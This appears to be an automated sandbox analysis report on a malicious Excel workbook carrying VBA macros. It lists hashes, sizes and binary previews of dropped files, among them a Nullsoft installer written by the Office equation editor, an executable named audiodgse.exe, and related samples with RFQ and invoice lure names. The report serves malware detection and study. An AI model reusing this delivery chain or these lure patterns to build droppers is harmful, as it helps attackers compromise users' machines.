                                                • Filename: Civilizee.exe, Detection: malicious, Browse
                                                • Filename: Civilizee.exe, Detection: malicious, Browse
                                                • Filename: RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exe, Detection: malicious, Browse
                                                • Filename: RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exe, Detection: malicious, Browse
                                                • Filename: RFQ____RM_quotation_JPEG_IMAGE.exe, Detection: malicious, Browse
                                                • Filename: RFQ____RM_quotation_JPEG_IMAGE.exe, Detection: malicious, Browse
                                                • Filename: I-ID-4175285786-D07450364_20230803042004.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Roaming\audiodgse.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):42
                                                Entropy (8bit):4.308751351247167
                                                Encrypted:false
                                                SSDEEP:3:T9RurfyWGRMWyn:TaSMWyn
                                                MD5:F54A2E254A72D0CC8E1EF8327CB8A7B5
                                                SHA1:B5635CB7A221E52073F56017FD4DBE36BAAC3228
                                                SHA-256:DB054403B148F267DE03752254EB25A8E981E59CA9F6E93F3E39C1E9D70405A7
                                                SHA-512:5A343BD2A70006CEE64831AB815DCAF1170BC7282378670236A835799DD1292B0A6D7496B863C3522F4379A94E0365DE5367F93D275A09D9A8F97A3426983382
                                                Malicious:false
                                                Preview:[coryphodont]..Antihemorrheidal=bursitis..
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):872448
                                                Entropy (8bit):7.383067490138402
                                                Encrypted:false
                                                SSDEEP:24576:5WQmmav30xyZyXw6Vv9bVbDTZy3w6VW4bVaP:IQmmQ30Wv6Vv9bVlr6VW4bV
                                                MD5:8A694BB67C2094504C07DFCD1EEA3C85
                                                SHA1:F24A088C75650D46563B71122EB08BFB12B6E42A
                                                SHA-256:8026FFE67B81C990942D43CC16EA9F5977EB143B88C256CB81EB5B45F5B15378
                                                SHA-512:2FBD89361916D1D0D076D9A912415C6F58548DE73EA9B52B4CD4931147348518AAA2653ABE0F426489DEC660AD32B54F493C01E472ED0BA0BCF70F416BED2FFF
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):11776
                                                Entropy (8bit):5.883387298430576
                                                Encrypted:false
                                                SSDEEP:192:zIuQTAbFEBP6pIMAiuvgOI3EDg7d25yLo7u:zATNBP+buxQQ3gs
                                                MD5:535830F62EA1DC79B8A3E1B8A3BFA92D
                                                SHA1:D8AA747B92C2ABF706D9F412AE1241390C42A9F1
                                                SHA-256:EF29888668C5BAC940F6A0D983761656AB4BE99700C585DD34BC568DC8BB40A8
                                                SHA-512:DF6AF0C6B269C6CC158E870FA0FD239711732A9D3A9109A146C9470CA36174E072574BFAE0FAC9BD932B2F876E2E78584540738C3AAD95311FFDD85922162D5E
                                                Malicious:false
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):11776
                                                Entropy (8bit):5.8416171097032406
                                                Encrypted:false
                                                SSDEEP:96:k68iQ30YWuQTqK7dAztFEB7wHSn81Suqsr0vkL9xAB/jrBzmKdDUjAPbNxBIwB7I:oIuQTXkFEBP6pIMkrlzDDgkNn5yLo
                                                MD5:1D8A38B56A21BD472FBAC97B063EA839
                                                SHA1:658605BD9C690ACFD869571C52FF68EBCB2ACD86
                                                SHA-256:2B8442544B91B71978BD1C1C885A5BF80CF0BDE698754D7AF42919FCAB21C655
                                                SHA-512:D8719A4C9924F5FF75E92F0A2AD2597505F3C880C6C525B1851491E719DBD32F50367DEFDF5FA02C52E0A28FAAC014A05DB5A6E473EB1DE5E5E1FA663F08ECE4
                                                Malicious:false
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):10240
                                                Entropy (8bit):0.6739662216458647
                                                Encrypted:false
                                                SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                                                MD5:C61F99FE7BEE945FC31B62121BE075CD
                                                SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                                                SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                                                SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                                                Malicious:false
                                                Preview: ....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):24152
                                                Entropy (8bit):0.7532185028349225
                                                Encrypted:false
                                                SSDEEP:48:CMnfnO4FGtsFqN6t8nlztZKR6axR6uiozVb:ZnfO4kWKpZKdxR35
                                                MD5:520FE964934AF1AB0CEBA2366830D0FA
                                                SHA1:B90310ACA870261CB619FDFD1E54E1B1A25074FF
                                                SHA-256:DBD45EEA386D364B30BA189E079BFA05C2C40D9E5E83722C39A171998ED079C1
                                                SHA-512:A4839A6AB8DB522D9121A590B8C711E8C4F172D9CB71C918860F8048472920F3341B7BA624DFF514BE397809149E4471B2DF981DC81FE77C26B2DDF342A42F8C
                                                Malicious:false
                                                Preview: ...W....K.h.E..g..0...!1sm.[t\......A......5_...N{Yf?.w..[.Y..A...a^..(._.=.......:.v.$*.....e...F....f.qo.]...B1{.8.%%..,...;.|..<....g ....l.7.`ny.h.n.y...~Y.../.. .WZ.'......AI.|.._K}-$.i..<(.7Y...U....T.i.N.'Pt..c.[........<zni.::. 8W.<S...8!.Wh..;T.?.^yf...E?...pQ....i.;>/..^...r.YsncP..@.. .[".^..A.|.0..$<bC.G........~];..D.|.v.B.).g.E5.?... .N...}....i.,5..a.Fk.%.u.`..F...;xlw.}.5.Jt..c.5.....v...~)..8b|.*.B.]-]jk....PQZ..T}..M.S...88......?.*$..]..%V..D.<.5.d...[..Z.....2........%.$E..+sb.......*...g...>Q[l.}......@=..5L..._....Pi..HY.<[..l...H....9.\=u.v.....S8-&...,5..}t......m...*..R.W.G.NZ....w.....{.iA......G.f.TN.zk..(....q).....n....3..C...d./..........................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Mon Oct 16 06:58:51 2023, atime=Mon Oct 16 06:58:54 2023, length=1424384, window=hide
                                                Category:dropped
                                                Size (bytes):1129
                                                Entropy (8bit):4.483720005088116
                                                Encrypted:false
                                                SSDEEP:12:87V1RgXg/XAlCPCHaX2BZB/5YXX+W3/WIAxWmftKicvb8p5SaExWmpDtZ3YilMM4:83/XTmD4XxWx/frei5Snx/pDv3qok7N
                                                MD5:1AD7075E8F10ADFDD3DE06909FC2AF8D
                                                SHA1:86B0AF632C212C10E9524FE3BC1EB9638899E758
                                                SHA-256:1383DD89D5BC49DAB414B483F0679A01531D831B72B8D4587B3CB1BC43458A0B
                                                SHA-512:786F97EAF3BDDC3A2B6722DC4C9E1F5F7EFA1F427F003AEA3464202C8F93DF12C36BFACDE8A35814710ED5D0953C36F5AECEAEDA8483CEF1642BB30C14D3136E
                                                Malicious:false
                                                Preview:L..................F.... ......r....u..........................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......WE...user.8......QK.X.WE.*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....PW@? .#U4E5D~1.XLS..x.......WE..WE.*.........................#.U.4.e.5.d.#.U.6.7.0.8.#.U.5.8.f.0.#.U.6.6.0.e._.4.0.9.8.1.6.7.7...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\347688\Users.user\Desktop\#U4e5d#U6708#U58f0#U660e_40981677.xls.<.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.#.U.4.e.5.d.#.U.6.7.0.8.#.U.5.8.f.0.#.U.6.6.0.e._.4.0.9.8.1.6.7.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Generic INItialization configuration [folders]
                                                Category:modified
                                                Size (bytes):34
                                                Entropy (8bit):4.0286393118385755
                                                Encrypted:false
                                                SSDEEP:3:zTBCm4FCv:zTV
                                                MD5:FCED6D2684017D184489C05D87BB12FD
                                                SHA1:EB0EE73F14F995909A8876BAE400E2382D469C4E
                                                SHA-256:429755BF8A4922B2CD81D3E3B09E0D84E955D016BFCB11E07C968F77225A7465
                                                SHA-512:FDFB1BE8ACBD4A6B299F8C766115BE29AC51E8A76AD001C151694001B1B9DD565317843B14B990266BB7D0822C7E291D7C53D7A1B159E107DE1968CC51B6C2FE
                                                Malicious:false
                                                Preview:[xls]...LNK=0..[folders]...LNK=0..
                                                Process:C:\Users\user\AppData\Roaming\audiodgse.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):86434
                                                Entropy (8bit):4.596147320376854
                                                Encrypted:false
                                                SSDEEP:1536:3bje52+ESCvPspqbrBoZDdRxR9oEOWU0HqkL:3bq1fCvPOmrc5Rz9nWm
                                                MD5:DCDA6C782E8D6EE806DD3E1A71575B12
                                                SHA1:DD5394A4443E7E1CDBA0E565D8F0095854CEB3A5
                                                SHA-256:088C8536AF2896DF8E6873107C4183D013D137C924BBE8C32F29A35D46874DBB
                                                SHA-512:5AE46A43F73EBE19DB3B4A0FA6A3EAA70875EA34F23CC0565F9872D3FD6D6E3B1A8E4E5658BDDA750D26BDEF5BBFAAD6D47F7BA5D7A27C38A70B7C6876A8BE8D
                                                Malicious:false
                                                Preview:............x.,.........yyyy.................Q.................,.............................;;;.........i....u................(((.11111.......V.3.....5...}........]]......w..........LLLL....z..............H..........._.................xxx.................ggg...................N..................................e..|..............9.....................P.......``............... ............................ssssss...t.....8.........S..7..........,,,......................G..^.......PP.66666.???..ll.............Q....^^^.....]]].........pppppp..777...............k...''........B....................~.....M........======.......N.....u.999...nnn.........,,...........II.7.........+...........................y................uu.$...;......\\\.......*...........................................................R....OO.....P...[[....e...............................................NNNNN......................H........ee.@....................''.....L........................................1..........bb.$$
                                                Process:C:\Users\user\AppData\Roaming\audiodgse.exe
                                                File Type:DIY-Thermocam raw data (Lepton 2.x), scale 246-148, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 2362119990157315670016.000000
                                                Category:dropped
                                                Size (bytes):163779
                                                Entropy (8bit):4.938326189697288
                                                Encrypted:false
                                                SSDEEP:3072:KNwfAuxv4zSDxRWO0kdxyjf5TWKuT56kieBNKYAqrszfq:6wffxA+tR8jV9uT5vieBNKYfgu
                                                MD5:0782692CFF38628B70495E562B2614A1
                                                SHA1:1CF24A8842C79FA929D31571AEB187673A91CF22
                                                SHA-256:136B62E6481EF62303BD2305C8FB497CE931521C71CB331CB92179621D558E20
                                                SHA-512:613F3E3CF46FE6222AD7C8562C785A23190502B4B4EEEF54CFFEB381AA1D7F71D1C307D480489046E34C6E4981594DB29E6E86382A49D8CFAB530E757DAA8B22
                                                Malicious:false
                                                Preview:. ......W...........)E..............................U...^.w....U........'....#.......18.{U....*.....?..........U....j....a.........-.d...7.3.[...'.h.v......D...}../....................!......t......................-.%:......H.D......./V...<.......h....z.b...R...............ju...s=Ee...j.............o......GA....(.....Z........................I.M....&8...,........,...-.......... .7.<............J5..........ix./.}&...c..D!........."..............N...........7.n].".......F..j..~...q..i..u..e.....8.......7A.....&.........Y.......D.....=...a........g...kUv.......{...Hm....................l......Y.......o............5.....G....%.......LK.............^....>........3.C......_..].O...B........W.b8.p.X.......n.%f'v...;........%....5...6........._...........&......\........r......o/Y*.....\...J.Hh.......X9..-uL.......(..dB.........v.............%.......q...z..............!.....6...._..............d..........x................L.............Ui...........d..&...Q(....N..+.F............
                                                Process:C:\Users\user\AppData\Roaming\audiodgse.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1390858
                                                Entropy (8bit):5.47049513454331
                                                Encrypted:false
                                                SSDEEP:12288:4iaNjSuAdwvibD6iNM4Fe4IeLIK12pGOifrwpSO1VmTE1tjGcMMvLLIikq5wa:mN2ivuNhbI9pGOQmSO1VHacVTLI9q6a
                                                MD5:D4910FD9A8A5BBF2030E2D2480BAC516
                                                SHA1:B7CDA4C565EE6BCCB3956AFE5DC057CA9A1B5993
                                                SHA-256:C5EC53E76C60CE7494228BA21E135C1698B8EF82365119DF3759BEC2DFECE45C
                                                SHA-512:F917486869AF1F6AF4466DE5B2F62777885E5A4B4B5686DA8FD687A3F8A24975315A00AD887457D7675085DCAB9D05FBD76A4634143A8F744DD23D5808D95B50
                                                Malicious:false
                                                Preview:.........nn.."...............ttt..........ff.........[.).."........--......3....D......RR....rr.............44.....ccc.................4....//....hh..........;;;;;;;;;..UUUU.RRRRRR................}.p...................22222............$.##.......:............\.............J........N........x..................::::..yyy...........S......{...........gg..........:................11.... ...P...ddd...w........@..HH...................ccc......y.777..........AA................--....$$$$$$..^^......f.................c.........+..... .........................[[[..........,,.........ww.......SS......bbbb.....................zzz......+..H.....k..........%%%......\\.0......$$$$............y......hh............==..............b..rr..G.........................b....................)).2........TT................&&&&...........2222.__.............^^............a.........q...............X.....gg.........@........................qq.....}..........o....5..............))................g...............tt...
                                                Process:C:\Users\user\AppData\Roaming\audiodgse.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):144737
                                                Entropy (8bit):4.9429482615607165
                                                Encrypted:false
                                                SSDEEP:3072:5w8VNxOulgKUnkFg3sgS2fm0ieW5zym0HVCmV:5woLlgKUnkFHgSURz4zIrV
                                                MD5:F84B9E2BDA2302BC917050F4F1B5C907
                                                SHA1:8258DE54AEC259536F36285708D66E494D247905
                                                SHA-256:8B4250121C2470B3E1458EE51E6DB638C7DAE2A188F24D9141849D267B65D36B
                                                SHA-512:1AFD54A056CBB8D7D87DBAB318F46D77706C4F05735E52DE3301FD2A78EB36637CF534E2CED8638689C1904828829A11E1974D4679E1D297068E293DF6D55CA2
                                                Malicious:false
                                                Preview:.2.r.A................b...F...S.v..]....Z......n?.................k.........R.({.E;......U........2.........<.1..............F.(...........p.3..............Z.............|.............Q..P.Zw...JZ.......:.....)A....[RV...H............O.................B.....5..)....~..k.....|.1....d......6@...+.....j......"g.y.-?..........DB*.\......'K...M........*..I.....Q.........S.....B.........2.3.N.....E....C......b....K.6................$...Z.^.{.........[Y........ ...6,..&..P....f}.L.....q.....1..".\.....j.......fT...B.F.................8.........e...q.............6.|.....F.._"...?..........1O..&.K..t...<n:..................=...DO,..c.L.....N+...3..!.....J..Hg;.}.}........2.4.,......."4.C.........n............c.O....2.E.....lr`.:..ea........qC...Q....h.....r..........Z...............q}t."..M.......!V..b.........C..9....J..v......+...........=...v&...............K..[..D.........{..L....u........5...*..................:.....7.e..}.P.....*`.^..M...p..M..<4.......n......4....'........(L..
                                                Process:C:\Users\user\AppData\Roaming\audiodgse.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):243403
                                                Entropy (8bit):4.95927012728034
                                                Encrypted:false
                                                SSDEEP:6144:ZATFfjMU61iyzkn+upJwQIkCqLWZNPzlmAZOibfQJGnbOKVy:sfjr61RO+uwQ5ENPzmib4Yy
                                                MD5:894C5CFD443EABAA15BE7A7CCEA4E9F5
                                                SHA1:C25D071C1BBDB7813B5A9EB8E7D04FFACB063389
                                                SHA-256:3CE9F1F2DC922EB0ED91C0ED1264D17506B7B4EF065E49555F77A96317A3CCD5
                                                SHA-512:FCD61116FAA5CCFB004CCAAFDA68AA42BAB7CF3AF8B0D0AD6AF67A0132434806765A1EBB4C36F12ED69745D1A3BE1F4A4C5AADCA15FECED53D37C004104CCAD0
                                                Malicious:false
                                                Preview:-............Y...........".............-......A:...h............#.......[...\."...................?.D..a...?.............~."....)....R.........M....P...].b;....a.u.Ia..z.....n.t....S....[........).W.......l..e................M+......\...........%...$..%..n..............-............+F...!..n.......y..................C[..]...f....s.....(................q.l...'...........l...m.7.5...t....kcZ..Q....(.x....zn..........B..W....G..........a.....:*............1.q...v. ......\L.1..2./Q....5.........5.k..w.....!....P......K..+...[......y.2............#....@.p...2..D.7. c..&..................#.......7.'..............T.(E...!...............I........]............g...>.r.U...4........<....................B....1....|........O.R.........3[.v....+....a).....@....!.F...;...u. .....^....q_.V|BJ..w`........jM........F.....A../..$....0.d..5N..g..v.................-p............E....YU.....+....|....%..........S....5..>.G...........y....E..i.)....V.......................h...(Q[-G.:.........]........Y
                                                Process:C:\Users\user\AppData\Roaming\audiodgse.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):456
                                                Entropy (8bit):4.292190557993067
                                                Encrypted:false
                                                SSDEEP:12:U6cKWn1izXeejCThRvO4IQJWc05kC257zNC1NFLyx:U3KW1SeeYzvlIQJd0qC25MByx
                                                MD5:1693541DFB1E3B101649889AAE97DC5B
                                                SHA1:E9F89EE2A9F46ABB9738625B97600EE3B56B705D
                                                SHA-256:A4943074FBBB15A41254082AB6FEA90FE5D302F6E6969E963F6B04A92B49F739
                                                SHA-512:B72C8DB040CDA851C4D68110DB1E6CCBA2D90DF93AE829E03436F17223693014FBF2F68D4AC713FA0CF2A74055424250F5DB8C285CC8A767BF7C894788724EA7
                                                Malicious:false
                                                Preview:udviklingscenter tiljubler kurrende kaper politicalized vandindvindingsanlgget neuroleptanalgesia havergrass postique flise baptizer sprjtenarkomanen..imino udklippende forpakning unalterably.daedalean skeers fogyishness parathyroidectomised udlign autocrat maskinparkens teknokratiseret..rutebaadenes unpreventable bogkrybbens sknhedspletternes overstegnes slugtens dekorum,urbane serest selektionernes,liquify adfrdsmnstres polybranchian neall brandtale.
                                                Process:C:\Users\user\AppData\Roaming\audiodgse.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):5935
                                                Entropy (8bit):4.893001480959504
                                                Encrypted:false
                                                SSDEEP:96:wCHb7caV5pcvPQzcsG4LMvyER8TY8Vvj3B442oBIBr7qTRRtSubJuf+F5LzllGEt:dPcaV3cnQzc4LZECYQt2jqT1bJuWjLzR
                                                MD5:064C026C4CAA1483900E7AC2C0DFFF1C
                                                SHA1:EAAF94292A01CF711B27321265A929E4C8F2A9DF
                                                SHA-256:B3E57DBE2DE42502F0C3D005F8347C1B2B72B6A29EC80474921C6A274FF2E081
                                                SHA-512:15B03A3DBB34CDB0AFA733FEF6761A4955A4891015F1A6E43EDFC86EB05790AA4C6929D8374A47AADDE4C911BB7F100E329C866E68959887DB9897761627300D
                                                Malicious:false
                                                Preview:.g.....k....q.......DL..+.n....S.*...V.. .+..U.........<..X....e.".....6.....g...........f....49.......dE.h.......X...[....M.....M.....y.........T..w`E....5l.z..............c,..y..o....................QE...............r......)....../.........;..g....c.A.rf.k.....[..Z...i............M......[.............V|..F...........1.(....).z.@....I......J....W............A................[..4.....B,..B.k......g...C..3...t.....{....5.9._F.........T........Q.....e............C.... ........E{.....k....(.x..l..............A....,w........@........9.`....Z..........a3...$W....#..Bd.....c..........e...............r......~......jl..................hj..... .....l.'m.4............._..<.Q.f...>6.......e...M..........'.......&.....n....."\.....F.....O.....A...........................I._.........i...<.d."......m................o...U....y;........+........o.O...> ........$..o......v............./......................................z...7w8g...2.........:....a~...........Is.....N.$....a.............Y...
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:dropped
                                                Size (bytes):1272864
                                                Entropy (8bit):7.983367304390116
                                                Encrypted:false
                                                SSDEEP:24576:ZQ3IGHgEKN05uKEPfbze1J9c8ae1D1FkTaO/bwntZKo4PCnsoO+Lt:ZQ3IbGEf+X9Xtk2O/bw7KpCnsa5
                                                MD5:6E8215EEE3034D6DCF18D79D397E5715
                                                SHA1:5612BFF0830A9A025EB35CF7C054D2062745D1B9
                                                SHA-256:AC4761C259DAEDE4B4EFB78816C98FB56344E381BB56D69EA897C30C9899BF39
                                                SHA-512:5B5A08E02C7F58F25A436508848F90D397C2545B474F37202CEF5F8BA9D4924761E500A2D54E082F51EABD80B2CC33D21D73B45206D79E64C7BB0CE21ABF83C1
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 32%
                                                • Antivirus: Virustotal, Detection: 32%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.*....F..G.w.F.*....F..v..F...@..F.Rich.F.........PE..L......].................`..........52.......p....@.......................................@.................................0t.......................T...............................................................p...............................text...}_.......`.................. ..`.rdata..>....p.......d..............@..@.data................x..............@....ndata...`...@...........................rsrc................|..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 16 08:58:53 2023, Security: 0
                                                Category:dropped
                                                Size (bytes):1424384
                                                Entropy (8bit):7.841255073938591
                                                Encrypted:false
                                                SSDEEP:24576:+WQmmav30x3Zyvw6Vr9bV1DWZylw6VK4bV1P9qfa4HBA8b7DJHj/xOroKK3t2fon:zQmmQ30jr6Vr9bVWh6VK4bVKRA8bXJLT
                                                MD5:5E6148DC18712F3B090652691D016616
                                                SHA1:D5488DED267AD18F555AA81F5745E4C708A66BB6
                                                SHA-256:9F490B1971564541CF4A4E0FEDAD05798BF719B5449B7CF2A59A97CF5F6CB343
                                                SHA-512:24BD24571A2F510E25475A848AE3D1438E71685A18B19E865C99F2A6AAA62B671EB28C1DF1E567C53D5CDF1AF5A312CF2BE4191122596A3892EA1CF75D6CA536
                                                Malicious:false
                                                Preview:......................>.......................................................0...1...H...I...?.......................$.......b.......d.......f.......h.......j.............................................................................................................................................................................................................................................................................................................................................................................../.......G................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-...........F...........3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun Oct 15 16:35:19 2023, Security: 0
                                                Entropy (8bit):7.762599010466731
                                                TrID:
                                                • Microsoft Excel sheet (30009/1) 47.99%
                                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                File name:#U4e5d#U6708#U58f0#U660e_40981677.xls
                                                File size:1'282'048 bytes
                                                MD5:c1a75affe1c99a629a5fb4b3df7359e9
                                                SHA1:86e4a29c68354c25cda769698fdd189e9f2f14b1
                                                SHA256:649e9cc1261032e6098f6469b87a16e4342c159b29725af71afeb71183513aad
                                                SHA512:ba43428de8522fc326a36b7cd0d737263564aaf2cc5020e150be72ce1fa1888da7ca9265c5190172f8f8b268b6a89aaba7ddb0969c9aee92eed7387f1048f715
                                                SSDEEP:24576:bWQmmav30xrZyuw6V33bVSkmZypw6VW3bVz4i4fp5g2QcXQ5ZdAI9SvSw4x:6QmmQ30DK6V33bVQd6VW3bVWU2rXcAIR
                                                TLSH:4455E003E840CA83D40D83F97E633EE91B1EBF15E9D16ACB11567F4B3A706A2095B51E
                                                File Content Preview:........................>.......................................................0...1...H...I...?.......................".......~...............b.......d......................................................................................................
                                                Icon Hash:276ea3a6a6b7bfbf
                                                Document Type:OLE
                                                Number of OLE Files:1
                                                Has Summary Info:
                                                Application Name:Microsoft Excel
                                                Encrypted Document:False
                                                Contains Word Document Stream:False
                                                Contains Workbook/Book Stream:True
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:False
                                                Flash Objects Count:0
                                                Contains VBA Macros:True
                                                Code Page:1252
                                                Author:
                                                Last Saved By:
                                                Create Time:2006-09-16 00:00:00
                                                Last Saved Time:2023-10-15 15:35:19
                                                Creating Application:Microsoft Excel
                                                Security:0
                                                Document Code Page:1252
                                                Thumbnail Scaling Desired:False
                                                Contains Dirty Links:False
                                                Shared Document:False
                                                Changed Hyperlinks:False
                                                Application Version:786432
                                                General
                                                Stream Path:MBD0010AD51/_VBA_PROJECT_CUR/VBA/Sheet1
                                                VBA File Name:Sheet1.cls
                                                Stream Size:977
